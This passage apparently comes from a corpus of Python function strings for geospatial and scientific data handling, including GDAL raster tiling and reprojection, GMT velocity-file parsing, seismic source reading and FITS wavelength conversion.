directory.\n here = os.getcwd()\n #Need the file_name to set globe, so that other functions can access to it.\n global file_name\n # Spite the Input into file_path and file_name.\n file_path = spilt_path(file)[0]\n file_name = spilt_path(file)[1]\n\n # Try to get into the file_path, if exist\n try:\n os.chdir(file_path)\n except IOError, e:\n print e\n\n # Now convert it\n convertFile(file_name)\n # going back to orgin folder\n os.chdir(here)\n return os.path.join(output_dir, file_name)", "def open_input(self):\n gdal.AllRegister()\n\n self.out_drv = gdal.GetDriverByName(self.tiledriver)\n self.mem_drv = gdal.GetDriverByName('MEM')\n\n if not self.out_drv:\n raise Exception(\"The '%s' driver was not found, is it available in this GDAL build?\",\n self.tiledriver)\n if not self.mem_drv:\n raise Exception(\"The 'MEM' driver was not found, is it available in this GDAL build?\")\n\n # Open the input file\n\n if self.input_file:\n input_dataset = gdal.Open(self.input_file, gdal.GA_ReadOnly)\n else:\n raise Exception(\"No input file was specified\")\n\n if self.options.verbose:\n print(\"Input file:\",\n \"( %sP x %sL - %s bands)\" % (input_dataset.RasterXSize,\n input_dataset.RasterYSize,\n input_dataset.RasterCount))\n\n if not input_dataset:\n # Note: GDAL prints the ERROR message too\n exit_with_error(\"It is not possible to open the input file '%s'.\" % self.input_file)\n\n # Read metadata from the input file\n if input_dataset.RasterCount == 0:\n exit_with_error(\"Input file '%s' has no raster band\" % self.input_file)\n\n if input_dataset.GetRasterBand(1).GetRasterColorTable():\n exit_with_error(\n \"Please convert this file to RGB/RGBA and run gdal2tiles on the result.\",\n \"From paletted file you can create RGBA file (temp.vrt) by:\\n\"\n \"gdal_translate -of vrt -expand rgba %s temp.vrt\\n\"\n \"then run:\\n\"\n \"gdal2tiles temp.vrt\" % self.input_file\n )\n\n in_nodata = setup_no_data_values(input_dataset, self.options)\n\n if self.options.verbose:\n print(\"Preprocessed file:\",\n \"( %sP x %sL - %s bands)\" % (input_dataset.RasterXSize,\n input_dataset.RasterYSize,\n input_dataset.RasterCount))\n\n in_srs, self.in_srs_wkt = setup_input_srs(input_dataset, self.options)\n\n self.out_srs = setup_output_srs(in_srs, self.options)\n\n # If input and output reference systems are different, we reproject the input dataset into\n # the output reference system for easier manipulation\n\n self.warped_input_dataset = None\n\n if self.options.profile in ('mercator', 'geodetic'):\n\n if not in_srs:\n exit_with_error(\n \"Input file has unknown SRS.\",\n \"Use --s_srs ESPG:xyz (or similar) to provide source reference system.\")\n\n if not has_georeference(input_dataset):\n exit_with_error(\n \"There is no georeference - neither affine transformation (worldfile) \"\n \"nor GCPs. You can generate only 'raster' profile tiles.\",\n \"Either gdal2tiles with parameter -p 'raster' or use another GIS \"\n \"software for georeference e.g. gdal_transform -gcp / -a_ullr / -a_srs\"\n )\n\n if ((in_srs.ExportToProj4() != self.out_srs.ExportToProj4()) or\n (input_dataset.GetGCPCount() != 0)):\n self.warped_input_dataset = reproject_dataset(\n input_dataset, in_srs, self.out_srs)\n\n if in_nodata:\n self.warped_input_dataset = update_no_data_values(\n self.warped_input_dataset, in_nodata, options=self.options)\n else:\n self.warped_input_dataset = update_alpha_value_for_non_alpha_inputs(\n self.warped_input_dataset, options=self.options)\n\n if self.warped_input_dataset and self.options.verbose:\n print(\"Projected file:\", \"tiles.vrt\", \"( %sP x %sL - %s bands)\" % (\n self.warped_input_dataset.RasterXSize,\n self.warped_input_dataset.RasterYSize,\n self.warped_input_dataset.RasterCount))\n\n if not self.warped_input_dataset:\n self.warped_input_dataset = input_dataset\n\n #Salva o arquivo reprojetado\n self.warped_input_dataset.GetDriver().CreateCopy(self.tmp_vrt_filename,\n self.warped_input_dataset)\n\n # Get alpha band (either directly or from NODATA value)\n self.alphaband = self.warped_input_dataset.GetRasterBand(1).GetMaskBand()\n self.dataBandsCount = nb_data_bands(self.warped_input_dataset)\n\n # KML test\n self.isepsg4326 = False\n srs4326 = osr.SpatialReference()\n srs4326.ImportFromEPSG(4326)\n if self.out_srs and srs4326.ExportToProj4() == self.out_srs.ExportToProj4():\n self.kml = True\n self.isepsg4326 = True\n if self.options.verbose:\n print(\"KML autotest OK!\")\n\n # Read the georeference\n self.out_gt = self.warped_input_dataset.GetGeoTransform()\n\n # Test the size of the pixel\n\n # Report error in case rotation/skew is in geotransform (possible only in 'raster' profile)\n if (self.out_gt[2], self.out_gt[4]) != (0, 0):\n exit_with_error(\"Georeference of the raster contains rotation or skew. \"\n \"Such raster is not supported. Please use gdalwarp first.\")\n\n # Here we expect: pixel is square, no rotation on the raster\n\n # Output Bounds - coordinates in the output SRS\n self.ominx = self.out_gt[0]\n self.omaxx = self.out_gt[0] + self.warped_input_dataset.RasterXSize * self.out_gt[1]\n self.omaxy = self.out_gt[3]\n self.ominy = self.out_gt[3] - self.warped_input_dataset.RasterYSize * self.out_gt[1]\n # Note: maybe round(x, 14) to avoid the gdal_translate behaviour, when 0 becomes -1e-15\n\n if self.options.verbose:\n print(\"Bounds (output srs):\", round(self.ominx, 13), self.ominy, self.omaxx, self.omaxy)\n\n # Calculating ranges for tiles in different zoom levels\n if self.options.profile == 'mercator':\n\n self.mercator = GlobalMercator()\n\n # Function which generates SWNE in LatLong for given tile\n self.tileswne = self.mercator.TileLatLonBounds\n\n # Generate table with min max tile coordinates for all zoomlevels\n self.tminmax = list(range(0, 32))\n for tz in range(0, 32):\n tminx, tminy = self.mercator.MetersToTile(self.ominx, self.ominy, tz)\n tmaxx, tmaxy = self.mercator.MetersToTile(self.omaxx, self.omaxy, tz)\n # crop tiles extending world limits (+-180,+-90)\n tminx, tminy = max(0, tminx), max(0, tminy)\n tmaxx, tmaxy = min(2**tz-1, tmaxx), min(2**tz-1, tmaxy)\n self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)\n\n # TODO: Maps crossing 180E (Alaska?)\n\n # Get the minimal zoom level (map covers area equivalent to one tile)\n if self.tminz is None:\n self.tminz = self.mercator.ZoomForPixelSize(\n self.out_gt[1] *\n max(self.warped_input_dataset.RasterXSize,\n self.warped_input_dataset.RasterYSize) /\n float(self.tilesize))\n\n # Get the maximal zoom level\n # (closest possible zoom level up on the resolution of raster)\n if self.tmaxz is None:\n self.tmaxz = self.mercator.ZoomForPixelSize(self.out_gt[1])\n\n if self.options.verbose:\n print(\"Bounds (latlong):\",\n self.mercator.MetersToLatLon(self.ominx, self.ominy),\n self.mercator.MetersToLatLon(self.omaxx, self.omaxy))\n print('MinZoomLevel:', self.tminz)\n print(\"MaxZoomLevel:\",\n self.tmaxz,\n \"(\",\n self.mercator.Resolution(self.tmaxz),\n \")\")\n\n if self.options.profile == 'geodetic':\n\n self.geodetic = GlobalGeodetic(self.options.tmscompatible)\n\n # Function which generates SWNE in LatLong for given tile\n self.tileswne = self.geodetic.TileLatLonBounds\n\n # Generate table with min max tile coordinates for all zoomlevels\n self.tminmax = list(range(0, 32))\n for tz in range(0, 32):\n tminx, tminy = self.geodetic.LonLatToTile(self.ominx, self.ominy, tz)\n tmaxx, tmaxy = self.geodetic.LonLatToTile(self.omaxx, self.omaxy, tz)\n # crop tiles extending world limits (+-180,+-90)\n tminx, tminy = max(0, tminx), max(0, tminy)\n tmaxx, tmaxy = min(2**(tz+1)-1, tmaxx), min(2**tz-1, tmaxy)\n self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)\n\n # TODO: Maps crossing 180E (Alaska?)\n\n # Get the maximal zoom level\n # (closest possible zoom level up on the resolution of raster)\n if self.tminz is None:\n self.tminz = self.geodetic.ZoomForPixelSize(\n self.out_gt[1] *\n max(self.warped_input_dataset.RasterXSize,\n self.warped_input_dataset.RasterYSize) /\n float(self.tilesize))\n\n # Get the maximal zoom level\n # (closest possible zoom level up on the resolution of raster)\n if self.tmaxz is None:\n self.tmaxz = self.geodetic.ZoomForPixelSize(self.out_gt[1])\n\n if self.options.verbose:\n print(\"Bounds (latlong):\", self.ominx, self.ominy, self.omaxx, self.omaxy)\n\n if self.options.profile == 'raster':\n\n def log2(x):\n return math.log10(x) / math.log10(2)\n\n self.nativezoom = int(\n max(math.ceil(log2(self.warped_input_dataset.RasterXSize/float(self.tilesize))),\n math.ceil(log2(self.warped_input_dataset.RasterYSize/float(self.tilesize)))))\n\n if self.options.verbose:\n print(\"Native zoom of the raster:\", self.nativezoom)\n\n # Get the minimal zoom level (whole raster in one tile)\n if self.tminz is None:\n self.tminz = 0\n\n # Get the maximal zoom level (native resolution of the raster)\n if self.tmaxz is None:\n self.tmaxz = self.nativezoom\n\n # Generate table with min max tile coordinates for all zoomlevels\n self.tminmax = list(range(0, self.tmaxz+1))\n self.tsize = list(range(0, self.tmaxz+1))\n for tz in range(0, self.tmaxz+1):\n tsize = 2.0**(self.nativezoom-tz)*self.tilesize\n tminx, tminy = 0, 0\n tmaxx = int(math.ceil(self.warped_input_dataset.RasterXSize / tsize)) - 1\n tmaxy = int(math.ceil(self.warped_input_dataset.RasterYSize / tsize)) - 1\n self.tsize[tz] = math.ceil(tsize)\n self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)\n\n # Function which generates SWNE in LatLong for given tile\n if self.kml and self.in_srs_wkt:\n ct = osr.CoordinateTransformation(in_srs, srs4326)\n\n def rastertileswne(x, y, z):\n pixelsizex = (2**(self.tmaxz-z) * self.out_gt[1]) # X-pixel size in level\n west = self.out_gt[0] + x*self.tilesize*pixelsizex\n east = west + self.tilesize*pixelsizex\n south = self.ominy + y*self.tilesize*pixelsizex\n north = south + self.tilesize*pixelsizex\n if not self.isepsg4326:\n # Transformation to EPSG:4326 (WGS84 datum)\n west, south = ct.TransformPoint(west, south)[:2]\n east, north = ct.TransformPoint(east, north)[:2]\n return south, west, north, east\n\n self.tileswne = rastertileswne\n else:\n self.tileswne = lambda x, y, z: (0, 0, 0, 0) # noqa", "def read(cls, file_name=None, lexclude=[], lonly=[], verbose=False):\n###################################################################\n\n # import\n import numpy as np\n \n # init\n \n vf = Velocity_Field()\n\n # fake 4-letters code generation using hexadecimal\n def __gen_fake_code__(n):\n \n FAKE = []\n for i in np.arange(n):\n fake_code = (\"%4s\" % hex(i).split('x')[-1].replace('L', '')).replace(' ', '0')\n FAKE.append(fake_code.upper())\n \n return(np.array(FAKE))\n\n # reads psvelo file\n\n if verbose:\n print(\"-- Reading GMT psvelo file: %s \" % file_name)\n \n try:\n np_vel = np.array(np.mat(np.genfromtxt(file_name, comments='#')))\n except:\n raise IOError(\"!!! Could not read file: %s\" % file_name)\n \n # empty psvelo file\n if np_vel.size == 0:\n return( vf )\n \n if (np_vel.shape[1] == 8):\n if verbose:\n print(\"-- file %s has 8 columns\" % file_name)\n\n np_vel = np.delete(np_vel, -1, axis=1)\n np_code = np.array(np.mat(np.genfromtxt(file_name, comments='#', usecols=(7), dtype=str))).flatten()\n \n elif (np_vel.shape[1] == 3):\n\n if verbose:\n print(\"-- file %s has 3 columns\" % file_name)\n\n np_vel = np.delete(np_vel, -1, axis=1)\n np_code = np.array(np.mat(np.genfromtxt(file_name, comments='#', usecols=(2)))).flatten()\n\n elif (np_vel.shape[1] not in [3, 8]):\n np_code = __gen_fake_code__(np_vel.shape[0])\n else:\n raise IOError(\"!!! Could not decipher file content: %s\", file_name)\n\n # populates velocity field\n \n from pyacs.lib.gmtpoint import GMT_Point\n\n lgmt_points = []\n\n for i in np.arange(np_vel.shape[0]):\n\n code = np_code[i]\n \n if np_vel.shape[1] >= 7:\n lon, lat, Ve, Vn, SVe, SVn, SVen = np_vel[i, :]\n M = GMT_Point(lon=lon, lat=lat, Ve=Ve, Vn=Vn, SVe=SVe, SVn=SVn, SVen=SVen, code=code)\n else:\n lon, lat = np_vel[i, :]\n M = GMT_Point(lon=lon, lat=lat, code=code)\n\n if verbose:\n M.get_info(display=True)\n \n # tests whether site will be added\n \n if lonly != []:\n if M.code in lonly:\n lgmt_points.append(M)\n \n else:\n if lexclude != []:\n if M.code not in lexclude:\n lgmt_points.append(M)\n else:\n lgmt_points.append(M)\n \n vf.file_name = file_name\n vf.sites = lgmt_points\n \n return vf", "def make(input_filepath, output_filepath) -> None:\n logger = logging.getLogger(__name__)\n logger.info('making final data set from raw data')", "def createInput(dirPath,gSettings):\n \n with open(os.path.join('../in','input.txt')) as f:\n inpFile = f.readlines()\n \n\n # Model settings\n model = gSettings[\"Model\"]\n inpFile[13] = \"insgrav: {:1d}\\n\".format(int(model[\"NS gravity\"][\"Flag\"]))\n inpFile[14] = \"isun: {:1d}\\n\".format(int(model[\"Lunisolar\"][\"Sun\"]))\n inpFile[15] = \"imoon: {:1d}\\n\".format(int(model[\"Lunisolar\"][\"Moon\"]))\n\n if model[\"Drag\"][\"Flag\"] == False:\n inpFile[16] = \"idrag: 0\\n\"\n else:\n dm = model[\"Drag\"][\"Model\"].lower()\n if dm == \"wertz\":\n idrag = 1\n elif dm == \"us76\":\n idrag = 2\n elif dm == \"j77\":\n idrag = 3\n elif dm == \"msis00\":\n idrag = 4\n else:\n raise ValueError('Value \"' + model[\"Drag\"][\"Model\"] + '\" invalid.')\n inpFile[16] = \"idrag: {:1d}\\n\".format(idrag)\n if model[\"Drag\"][\"Solar flux\"].lower() == \"constant\":\n inpFile[17] = \"iF107: 0\\n\"\n elif model[\"Drag\"][\"Solar flux\"].lower() == \"variable\":\n inpFile[17] = \"iF107: 1\\n\"\n else:\n raise ValueError('Value \"' + model[\"Drag\"][\"Solar flux\"] + '\" invalid.')\n\n if model[\"SRP\"][\"Flag\"] == False:\n inpFile[18] = \"iSRP: {:1d}\\n\".format(int(model[\"SRP\"][\"Flag\"]))\n else:\n inpFile[18] = \"iSRP: {:1d}\\n\".format(int(model[\"SRP\"][\"Flag\"]))\n if model[\"SRP\"][\"Eclipses\"]:\n inpFile[18] = \"iSRP: 2\\n\"\n \n if model[\"Lunisolar\"][\"Ephemerides\"] == \"DE431\":\n inpFile[19] = \"iephem: 1\\n\"\n elif model[\"Lunisolar\"][\"Ephemerides\"] == \"Meeus\":\n inpFile[19] = \"iephem: 2\\n\"\n else:\n raise ValueError('Value \"' + model[\"Lunisolar\"][\"Ephemerides\"] + '\" invalid.')\n \n inpFile[20] = \"gdeg: {:3d}\\n\".format(model[\"NS gravity\"][\"Degree\"])\n if model[\"NS gravity\"][\"Order\"] <= model[\"NS gravity\"][\"Degree\"]:\n inpFile[21] = \"gord: {:3d}\\n\".format(model[\"NS gravity\"][\"Order\"])\n else:\n raise ValueError(\"Order {0:d} of the gravity field is greater than degree {1:d}\".format(model[\"NS gravity\"][\"Order\"],model[\"NS gravity\"][\"Degree\"]))\n \n\n\n # Integration settings\n integ = gSettings[\"Integration\"]\n inpFile[29] = \"tol: {:22.15E}\\n\".format(integ[\"Tolerance\"])\n inpFile[30] = \"tspan: {:22.15E}\\n\".format(integ[\"Duration\"] * 365.25)\n inpFile[31] = \"tstep: {:22.15E}\\n\".format(integ[\"Step\"])\n inpFile[39] = \"eqs: {:2d}\\n\".format(integ[\"Equations\"])\n\n\n\n # Output settings\n inpFile[44] = \"verb: 0\\n\"\n inpFile[45] = \"out: \" + os.path.abspath(os.path.join(dirPath, ' '))\n\n\n with open(os.path.join(dirPath,'input.txt'),'w') as f:\n f.writelines(inpFile)", "def create_vector_datapackage(pk_type, path, file_flag, out_path):\n process_source(pk_type, path, file_flag, out_path)", "def vl2img(vl_json_in, fileformat):\n\n # TODO would prefer to do this properly with pipes\n # using | and shell=True is safe though given no arguments\n executables = {\"svg\": \"vg2svg\", \"png\": \"vg2png\", \"pdf\": \"vg2pdf\"}\n try:\n exe = executables[fileformat]\n except KeyError as e:\n print(e.output)\n try:\n return subprocess.check_output(\"vl2vg | %s\" % exe, shell=True, input=vl_json_in)\n except subprocess.CalledProcessError as e:\n print(e.output)", "def read_raytomo_dbase(self, inh5fname, runid, dtype='ph', wtype='ray', create_header=True, Tmin=-999, Tmax=999, verbose=False):\n if dtype is not 'ph' and dtype is not 'gr':\n raise ValueError('data type can only be ph or gr!')\n if wtype is not 'ray' and wtype is not 'lov':\n raise ValueError('wave type can only be ray or lov!')\n stalst = self.waveforms.list()\n if len(stalst) == 0:\n print 'Inversion with surface wave datasets only, not added yet!'\n return\n indset = h5py.File(inh5fname)\n #--------------------------------------------\n # header information from input hdf5 file\n #--------------------------------------------\n dataid = 'reshaped_qc_run_'+str(runid)\n pers = indset.attrs['period_array']\n grp = indset[dataid]\n isotropic = grp.attrs['isotropic']\n org_grp = indset['qc_run_'+str(runid)]\n minlon = indset.attrs['minlon']\n maxlon = indset.attrs['maxlon']\n minlat = indset.attrs['minlat']\n maxlat = indset.attrs['maxlat']\n if isotropic:\n print 'isotropic inversion results do not output gaussian std!'\n return\n dlon_HD = org_grp.attrs['dlon_HD']\n dlat_HD = org_grp.attrs['dlat_HD']\n dlon = org_grp.attrs['dlon']\n dlat = org_grp.attrs['dlat']\n if create_header:\n inv_header = {'minlon': minlon, 'maxlon': maxlon, 'minlat': minlat, 'maxlat': maxlat,\n 'dlon': dlon, 'dlat': dlat, 'dlon_HD': dlon_HD, 'dlat_HD': dlat_HD}\n self.add_auxiliary_data(data=np.array([]), data_type='Header', path='raytomo', parameters=inv_header)\n self._get_lon_lat_arr(path='raytomo', hd=True)\n for staid in stalst:\n netcode, stacode = staid.split('.')\n staid_aux = netcode+'_'+stacode\n stla, elev, stlo = self.waveforms[staid].coordinates.values()\n if stlo < 0.:\n stlo += 360.\n if stla > maxlat or stla < minlat or stlo > maxlon or stlo < minlon:\n print 'WARNING: station: '+ staid+', lat = '+str(stla)+' lon = '+str(stlo)+', out of the range of tomograpic maps!'\n continue\n disp_v = np.array([])\n disp_un = np.array([])\n T = np.array([])\n #-----------------------------\n # determine the indices\n #-----------------------------\n ind_lon = np.where(stlo<=self.lons)[0][0]\n find_lon = ind_lon \n ind_lat = np.where(stla<=self.lats)[0][0]\n find_lat = ind_lat\n # point 1\n distmin, az, baz = obspy.geodetics.gps2dist_azimuth(stla, stlo, self.lats[ind_lat], self.lons[ind_lon]) # distance is in m\n # point 2\n dist, az, baz = obspy.geodetics.gps2dist_azimuth(stla, stlo, self.lats[ind_lat], self.lons[ind_lon-1]) # distance is in m\n if dist < distmin:\n find_lon = ind_lon-1\n distmin = dist\n # point 3\n dist, az, baz = obspy.geodetics.gps2dist_azimuth(stla, stlo, self.lats[ind_lat-1], self.lons[ind_lon]) # distance is in m\n if dist < distmin:\n find_lat = ind_lat-1\n distmin = dist\n # point 4\n dist, az, baz = obspy.geodetics.gps2dist_azimuth(stla, stlo, self.lats[ind_lat-1], self.lons[ind_lon-1]) # distance is in m\n if dist < distmin:\n find_lat = ind_lat-1\n find_lon = ind_lon-1\n distmin = dist\n for per in pers:\n if per < Tmin or per > Tmax:\n continue\n try:\n pergrp = grp['%g_sec'%( per )]\n vel = pergrp['vel_iso_HD'].value\n vel_sem = pergrp['vel_sem_HD'].value\n except KeyError:\n if verbose:\n print 'No data for T = '+str(per)+' sec'\n continue\n T = np.append(T, per)\n disp_v = np.append(disp_v, vel[find_lat, find_lon])\n disp_un = np.append(disp_un, vel_sem[find_lat, find_lon])\n data = np.zeros((3, T.size))\n data[0, :] = T[:]\n data[1, :] = disp_v[:]\n data[2, :] = disp_un[:]\n disp_header = {'Np': T.size}\n self.add_auxiliary_data(data=data, data_type='RayDISPcurve', path=wtype+'/'+dtype+'/'+staid_aux, parameters=disp_header)\n indset.close()\n return", "def make_svm_input_file(input_filename, output_custom_pars_file='custom_svm_params.json', clobber=False,\n log_level=logutil.logging.INFO):\n log.setLevel(log_level)\n if not clobber:\n if os.path.exists(output_custom_pars_file):\n msg = \"A file named '{}' already exists. Please choose a unique name for the custom SVM parameter file.\".format(output_custom_pars_file)\n log.critical(msg)\n sys.exit()\n # Define trailer file (log file) that will contain the log entries for all processing\n if isinstance(input_filename, str): # input file is a poller file -- easy case\n logname = input_filename.replace('.out', '_svm_partam_gen.log')\n\n else:\n logname = 'svm_param_gen.log'\n\n # Initialize total trailer filename as temp logname\n logging.basicConfig(filename=logname, format=SPLUNK_MSG_FORMAT, datefmt=MSG_DATEFMT)\n # start processing\n starting_dt = datetime.datetime.now()\n log.info(\"Run start time: {}\".format(str(starting_dt)))\n\n try:\n # Parse the poller file and generate the the obs_info_dict, as well as the total detection\n # product lists which contain the ExposureProduct, FilterProduct, and TotalProduct objects\n # A poller file contains visit data for a single instrument. The TotalProduct discriminant\n # is the detector. A TotalProduct object is comprised of FilterProducts and ExposureProducts\n # where its FilterProduct is distinguished by the filter in use, and the ExposureProduct\n # is the atomic exposure data.\n log.info(\"Parse the poller and determine what exposures need to be combined into separate products.\\n\")\n obs_info_dict, total_obj_list = poller_utils.interpret_obset_input(input_filename, log_level)\n\n # Update all of the product objects with their associated configuration information.\n for total_item in total_obj_list:\n log.info(\"Preparing configuration parameter values for total product {}\".format(total_item.drizzle_filename))\n total_item.configobj_pars = config_utils.HapConfig(total_item,\n log_level=log_level,\n output_custom_pars_file=output_custom_pars_file)\n for filter_item in total_item.fdp_list:\n log.info(\"Preparing configuration parameter values for filter product {}\".format(filter_item.drizzle_filename))\n filter_item.configobj_pars = config_utils.HapConfig(filter_item,\n log_level=log_level,\n output_custom_pars_file=output_custom_pars_file)\n update_ci_values(filter_item, output_custom_pars_file, log_level)\n\n for expo_item in total_item.edp_list:\n log.info(\"Preparing configuration parameter values for exposure product {}\".format(expo_item.drizzle_filename))\n expo_item.configobj_pars = config_utils.HapConfig(expo_item,\n log_level=log_level,\n output_custom_pars_file=output_custom_pars_file)\n # Housekeeping: remove those pesky renamed copies of the input flc.fits/flt.fits files\n # generated by drizzlepac.haputils.product()\n if expo_item.drizzle_filename.endswith(\"_drc.fits\"):\n file_to_remove = expo_item.drizzle_filename.replace(\"_drc.fits\", \"_flc.fits\")\n if expo_item.drizzle_filename.endswith(\"_drz.fits\"):\n file_to_remove = expo_item.drizzle_filename.replace(\"_drz.fits\", \"_flt.fits\")\n if os.path.exists(file_to_remove):\n os.remove(file_to_remove)\n except Exception:\n exc_type, exc_value, exc_tb = sys.exc_info()\n traceback.print_exception(exc_type, exc_value, exc_tb, file=sys.stdout)\n err_msg = \"Something went wrong!\"\n log.error(err_msg)\n raise Exception(err_msg)", "def from_srf_file(self, filename, normalize=False):\n with open(filename, \"rt\") as f:\n # go to POINTS block\n line = f.readline()\n while 'POINTS' not in line:\n line = f.readline()\n\n npoints = int(line.split()[1])\n sources = []\n\n for _ in np.arange(npoints):\n lon, lat, dep, stk, dip, area, tinit, dt = \\\n map(float, f.readline().split())\n rake, slip1, nt1, slip2, nt2, slip3, nt3 = \\\n map(float, f.readline().split())\n\n dep *= 1e3 # km > m\n area *= 1e-4 # cm^2 > m^2\n slip1 *= 1e-2 # cm > m\n slip2 *= 1e-2 # cm > m\n # slip3 *= 1e-2 # cm > m\n\n nt1, nt2, nt3 = map(int, (nt1, nt2, nt3))\n\n if nt1 > 0:\n line = f.readline()\n while len(line.split()) < nt1:\n line = line + f.readline()\n stf = np.array(line.split(), dtype=float)\n if normalize:\n stf /= np.trapz(stf, dx=dt)\n\n M0 = area * DEFAULT_MU * slip1\n\n sources.append(\n Source.from_strike_dip_rake(\n lat, lon, dep, stk, dip, rake, M0,\n time_shift=tinit, sliprate=stf, dt=dt))\n\n if nt2 > 0:\n line = f.readline()\n while len(line.split()) < nt2:\n line = line + f.readline()\n stf = np.array(line.split(), dtype=float)\n if normalize:\n stf /= np.trapz(stf, dx=dt)\n\n M0 = area * DEFAULT_MU * slip2\n\n sources.append(\n Source.from_strike_dip_rake(\n lat, lon, dep, stk, dip, rake, M0,\n time_shift=tinit, sliprate=stf, dt=dt))\n\n if nt3 > 0:\n raise NotImplementedError('Slip along u3 axis')\n\n return self(pointsources=sources)", "def vaex_vertices_from_plyfile(filename):\n xyz = vertex_dict_from_plyfile(filename)\n return vx.from_dict(xyz)", "def convert_rows_to_wv(direct_file, grism_file, rows):\n\n # Collect data from FITS headers\n with fits.open(grism_file) as hdu:\n hdr = hdu[0].header\n hdr1 = hdu[1].header\n sci_postarg_1 = hdr['POSTARG1']\n sci_postarg_2 = hdr['POSTARG2']\n sci_crpix_1 = hdr1['CRPIX1'] # this isn't a real keyword...\n sci_crpix_2 = hdr1['CRPIX2'] \n\n with fits.open(direct_file) as hdu:\n hdr = hdu[0].header\n hdr1 = hdu[1].header\n data = hdu[1].data\n cal_postarg_1 = hdr['POSTARG1']\n cal_postarg_2 = hdr['POSTARG2']\n cal_crpix_1 = hdr1['CRPIX1']\n cal_crpix_2 = hdr1['CRPIX2']\n\n\n # Find the central source\n mean, med, std = sigma_clipped_stats(data, sigma=3.0, iters=5)\n sources = daofind(data-med, fwhm=3.0, threshold=5.*std)\n \n source = sources[np.where(sources['flux'] == np.max(sources['flux']))]\n x_cen, y_cen = source['xcentroid'], source['ycentroid']\n\n\n # Calculate the offset\n x_offset = sci_crpix_1 - cal_crpix_1 + (sci_postarg_1 - cal_postarg_1)/0.135\n y_offset = sci_crpix_2 - cal_crpix_2 + (sci_postarg_2 - cal_postarg_2)/0.121\n\n pos_x, pos_y = x_cen + x_offset, y_cen + y_offset\n\n constants_0 = [8.95E3, 9.35925E-2, 0.0, 0.0, 0.0, 0.0]\n constants_1 = [4.51423E1, 3.17239E-4, 2.17055E-3, -7.42504E-7, 3.4863E-7, 3.09213E-7]\n\n coords_0 = constants_0[0] + constants_0[1]*pos_x + constants_0[2]*pos_y\n coords_1 = constants_1[0] + constants_1[1]*pos_x + constants_1[2]*pos_y + constants_1[3]*pos_x**2 + constants_1[4]*pos_x*pos_y + constants_1[5]*pos_y**2\n \n wv = coords_0 + coords_1*(rows-pos_x) + pos_y\n\n return wv", "def cloud_optimize_inPlace(in_file:str,compress=\"LZW\") -> None:\n\t## add overviews to file\n\tcloudOpArgs = [\"gdaladdo\",in_file]\n\tsubprocess.call(cloudOpArgs)\n\n\t## copy file\n\tintermediate_file = in_file.replace(\".tif\",\".TEMP.tif\")\n\twith open(intermediate_file,'wb') as a:\n\t\twith open(in_file,'rb') as b:\n\t\t\tshutil.copyfileobj(b,a)\n\n\t## add tiling to file\n\tcloudOpArgs = [\"gdal_translate\",intermediate_file,in_file,'-q','-co', \"TILED=YES\",'-co',\"COPY_SRC_OVERVIEWS=YES\",'-co', f\"COMPRESS={compress}\"]#, \"-co\", \"PREDICTOR=2\"]\n\tsubprocess.call(cloudOpArgs)\n\n\t## remove intermediate\n\tos.remove(intermediate_file)", "def vtkReformat(inPath, outPath):\n # Get size of map\n inFile = open(inPath,\"rb\")\n lineList = inFile.readlines()\n for line in lineList:\n if line.lower().strip().startswith(\"dimensions\"):\n size = map(int,line.split(\" \")[1:dimension+1])\n break\n inFile.close()\n\n if dimension == 2: size += [0]\n\n outFile = open(outPath,\"wb\")\n for (i,line) in enumerate(lineList):\n if i == 1:\n newline = line.lstrip(line.rstrip(\"\\n\"))\n line = \"lddmm 8 0 0 {0} {0} 0 0 {1} {1} 0 0 {2} {2}\".format(size[2]-1, size[1]-1, size[0]-1) + newline\n outFile.write(line)", "def __init__(self, inputfile, mode=GA_ReadOnly):\n # Open the input file and read some metadata\n open(inputfile, 'r').close() # HACK: GDAL gives a useless exception\n if not isinstance(inputfile, bytes):\n inputfile = inputfile.encode('utf-8')\n try:\n # Since this is a SWIG object, clone the ``this`` pointer\n self.this = gdal.Open(inputfile, mode).this\n except RuntimeError as e:\n raise GdalError(str(e))\n\n # Shadow for metadata so we can overwrite it without saving\n # it to the original file.\n self._geotransform = None\n self._rastersizes = None", "def read_velocities(filename, return_grid=True, return_proj=False):\n ds = gdal.Open(filename)\n #Get dimensions\n nc = ds.RasterXSize\n nr = ds.RasterYSize\n \n geotransform = ds.GetGeoTransform()\n xOrigin = geotransform[0]\n xPix = geotransform[1] #pixel width in x-direction\n yOrigin = geotransform[3]\n yPix = geotransform[5] #pixel height in y-direction\n \n lons = xOrigin + np.arange(0, nc)*xPix\n lats = yOrigin + np.arange(0, nr)*yPix\n \n x, y = np.meshgrid(lons, lats)\n \n vband = ds.GetRasterBand(1)\n varr = vband.ReadAsArray()\n \n if return_grid and return_proj:\n return x, y, varr, ds.GetProjection()\n elif return_grid:\n return x, y, varr\n else: \n return varr", "def reproject_vector( path, epsg_from=None, epsg_to=None):\n\n if not epsg_to: raise Exception(\"please, specify the output EPSG codes\")\n\n inDataSet = None\n outDataSet = None\n inFeature = None\n outFeature = None\n outLayer = None\n\n try:\n\n driver = ogr.GetDriverByName('ESRI Shapefile')\n inDataSet = driver.Open(path, 0) # 0 means read-only\n\n # define input SpatialReference\n if not epsg_from:\n layer = inDataSet.GetLayer()\n inSpatialRef = layer.GetSpatialRef()\n else:\n inSpatialRef = osr.SpatialReference()\n inSpatialRef.ImportFromEPSG(epsg_from)\n\n # define output SpatialReference\n outSpatialRef = osr.SpatialReference()\n outSpatialRef.ImportFromEPSG(epsg_to)\n\n # create the CoordinateTransformation\n coordTrans = osr.CoordinateTransformation(inSpatialRef, outSpatialRef)\n\n # get the first input layer and the geometry type\n inLayer = inDataSet.GetLayer()\n geotype = inLayer.GetGeomType()\n lname = inLayer.GetName()\n\n drv = ogr.GetDriverByName(\"ESRI Shapefile\")\n outDataSet = drv.CreateDataSource(\"/vsimem/memory.shp\")\n\n outLayer = outDataSet.CreateLayer(lname, srs=outSpatialRef, geom_type=geotype)\n\n # add fields\n inLayerDefn = inLayer.GetLayerDefn()\n\n for i in range(0, inLayerDefn.GetFieldCount()):\n fieldDefn = inLayerDefn.GetFieldDefn(i)\n outLayer.CreateField(fieldDefn)\n\n # get the output layer\"s feature definition\n outLayerDefn = outLayer.GetLayerDefn()\n\n counter = 1\n\n # loop through the input features\n inFeature = inLayer.GetNextFeature()\n while inFeature:\n # get the input geometry\n geom = inFeature.GetGeometryRef()\n # reproject the geometry\n geom.Transform(coordTrans)\n # create a new feature\n outFeature = 